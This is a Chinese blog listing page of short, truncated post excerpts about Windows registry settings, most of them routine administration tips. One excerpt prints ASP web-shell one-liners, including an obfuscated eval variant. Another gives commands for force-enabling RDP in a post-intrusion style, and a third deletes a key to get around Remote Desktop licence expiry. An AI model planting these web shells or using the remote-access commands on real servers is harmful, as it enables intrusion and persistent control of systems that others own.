- 2024-07-06Windows防火墙 日志 自定义 以记录被丢弃的数据包和成功的连接日志。以下是一个示例.reg文件,根据您提到的域配置文件、专用配置文件和公用配置文件来配置这些设置:
配置注册表,以记录被丢弃的数据包和成功的连接日志 WindowsRegistryEditorVersion5.00;WindowsDefender防火墙日志记录设置[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy];以下是针对不同配置文件的设置,例如
- 2024-07-06在 Windows 操作系统中,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 下的两个重要参数控
在Windows操作系统中,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters下的两个重要参数控制着TCP/IP协议栈的行为。这些参数可以通过注册表来配置,影响网络连接和端口资源的管理。1.MaxUserPort路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSe
- 2024-07-06在注册表路径 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management 下的
在注册表路径HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement下的DisablePagingExecutive键控制着操作系统内核数据是否允许分页到页面文件中。这个设置对系统性能和稳定性有重要影响,特别是在高负载和内存紧张的情况下。DisablePagi
- 2024-05-22windows server2019远程桌面授权许可证过期解决办法
导致此现象的原因为服务器配置了多用户登录,在没授权的情况下,默认只能使用120天,之后远程连接时就会出现此报错,解决方法如下:删除注册表项:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\RCM\GracePeriod然后重启服务器注:注册表项可能无法删除,需要修改
- 2024-03-05SMB(Server Message Block)协议配置信息的位置
%SystemRoot%\system32\srvsvc.dll%SystemRoot%\System32\svchost.exe-ksmbsvcs%systemroot%\system32\wkssvc.dll%SystemRoot%\System32\svchost.exe-kNetworkService-p\Device\NetBT_Tcpip6_{93123211-9629-4E04-82F0-EA2E4F221468}\Device\Tcpip6_{93
- 2024-03-05Windows 操作系统中,Internet 协议版本 4 (TCP/IPv4) 的配置信息通常是保存在注册表中
%SystemRoot%\system32\tcpipcfg.dll%SystemRoot%\system32\drivers\tcpip.sysSystem32\drivers\tcpip.sys%SystemRoot%\System32\wshtcpip.dll%SystemRoot%\System32\mswsock.dll%SystemRoot%\System32\perfnet.dll%SystemRoot%\System32\wsock32.dll
- 2024-01-23安装Kaspersky Endpoint Security for Windows (12.3.0) 失败,提示安装了 360 Antivirus Software
最近,在升级卡巴斯基KES时,部分用户出现安装失败,提示已安装360杀毒软件,需要卸载后再安装。用户已经删除所有360软件。 经过测试,需要在注册表删除:HKEY_CURRENT_USER下面的software里面360和2345的东西。HKEY_LOCAL_MACHINE下面的software中有关360和2345的东西。HKEY_LOCAL_MAC
- 2023-11-23Windows重映射交换Esc与Cap键功能与恢复
参考链接:https://blog.csdn.net/qq_35333978/article/details/113702970重映射.regWindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\KeyboardLayout]"ScancodeMap"=hex:00,00,00,00,00,00,00,00,03,00,00,00,3a
- 2023-11-16优盘 注册表
1、运行REGEDIT,2、展开HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet,3、右击Control项,选择新建,重命名新建项为WriteProtect,并设置其值为00000001(十六进制),然后刷新即可.4、若要取消对闪存写保护的限制,将值改为00000000即可. 2. 禁用U盘:1、运行REGEDIT,2、展开HKEY_LO
- 2023-11-01startservice nc 2
现这种情况一般是因为驱动路径发生改变了,注册表中存储了旧路径,因此找不到驱动。解决方法是删除注册表中这个位置下这个驱动的项:HKLM\SYSTEM\CurrentControlSet\Service\1驱动都会在这里创建一个键,把对应的那个驱动的键删掉,重启机器即可。
- 2023-10-20Win2012 搭建NTP 服务器
1、regedit1、修改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config中"AnnounceFlags"值为52、修改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer中"Enabled"值为12、servi
- 2023-10-10Windows更换默认远程端口3389
直接上方法:1、打开注册表2、打开路径“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp”,修改“PortNumber”4、打开路径“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp”,修改“Port
- 2023-09-27Windows开3389集合
###Windowsserver2003/Windowsxpnetstarttermserviceregadd"HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer"/vfSingleSessionPerUser/tREG_DWORD/d0/fwmicpathwin32_terminalservicesettingwhere(__CLASS!="")call
- 2023-09-18windows server 原创用户启动后,弹窗--启动监听过程错误
描述:弹出应用程序:服务控制管理器:在系统启动时至少有一个服务或驱动程序产生错误。详细信息,请使用事件查看器查看事件日志。server2003/xp/2000每次弹出服务控制管理器“系统启动时至少有一个服务或驱动程序产生错误”解决方法。解决方法:打开注册表,找到HKEY_LOCAL_MACHINE\S
- 2023-08-14Windows卸载Oracle
1\删除regeditHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\oracle*HKEY_LOCAL_MACHINE\SOFTWARE\oracle*HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\oracle*2\删除环境变量后重启电脑3\删除oracle*文件\开始菜单
- 2023-07-28How to disable Windows 10 DNS Cache services
HiAdithya,DisableDNSClientthroughregistry:GotoHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dnscache,LocatetheStartregistrykeyandchangeitsvaluefrom2(Automatic)to4(Disabled)DisableDNSclientthroughcommandline:REGadd
- 2023-07-26关于打印共享的那些事,
今天看到一个小视频,了解到打印机共享常见连接出错问题的解决方案:注册表命令:regedit注册表目录:HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\Control\Print新建32位值名称:RpcAuthnLevelPrivacyEnabled,值为0共享与被共享都要配置,重启还需要!重点来了,打印机共享终极解决
- 2023-07-18在 Windows Server 2022 中,可以通过调整注册表来修改内核参数。以下是一些常见的内核参数调整
在WindowsServer2022中,可以通过调整注册表来修改内核参数。以下是一些常见的内核参数调整在WindowsServer2022中,可以通过修改注册表来调整TCP/IP栈参数、TCP策略和文件系统缓存。请注意,对注册表的更改需要谨慎操作,建议在进行更改之前备份注册表以及系统状态。调整线
- 2023-06-27 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Secureboot
regaddHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Secureboot/vAvailableUpdates/tREG_DWORD/d0x10/f命令是用于在注册表中添加一个名为"AvailableUpdates"的DWORD值,并将其设置为十六进制值"0x10"。此操作需要管理员权限才能执行。这个命令的作用是向
- 2023-06-06SMB 签章可以用于保护 SMB/TCP 协议传输的数据安全性,防止网络中的恶意用户或攻击者篡改原始数据。要启用 SMB 签章,可以执行以下批处理脚本
SMB签章可以用于保护SMB/TCP协议传输的数据安全性,防止网络中的恶意用户或攻击者篡改原始数据。要启用SMB签章,可以执行以下批处理脚本:CopyCode@echooffsetlocalrem启用SMB签章echoEnablingSMBsigning...regadd"HKLM\SYSTEM\CurrentControlSet\Services\Lanma
- 2023-05-12修改Windows远程桌面的端口
一、图形界面下修改启动注册表编辑器。(在“搜索”框中键入regedit。)导航到以下注册表子项:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp查找端口号单击“编辑”>“修改”,然后单击“十进制”。键入新端口号,然后单击“确定”
- 2023-04-08Lab03-02
目录样本信息字符串信息导入表信息导出表信息样本分析查杀思路总结技巧样本信息字符串信息导入表信息导出表信息样本分析Install函数ServiceMain函数SetAgent创建工作线程ThreatProc线程功能连接C2,接收C2指令(Y29ubmVjdA(继续下一次接收)、cXVpdA(关
- 2023-03-10一句话shell总结及开启3389端口
ASP一句话:<%execute(request("aaa"))%><%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%><%evalrequest("aaa")%>PHP一句话:
- 2023-02-19window10修改mstsc3389端口
概述完成修改window10/11默认3389端口为其他端口01、regeditwin+r//输入regedit打开注册表regedit02、修改PortNumber3389->x##m1注册表形式//改为自定
- 2023-02-06SQLServer2008安装报Restart computer failed的解决办法
今天安装SQLServer2008SP1的时候报RestartComputerFailed,后来把下面注册表项的值设为空即可:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Pen